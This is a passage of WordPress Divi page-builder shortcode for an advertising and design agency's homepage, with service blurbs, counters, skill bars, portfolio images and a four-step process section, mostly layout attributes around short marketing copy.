body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"-86px|||||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" 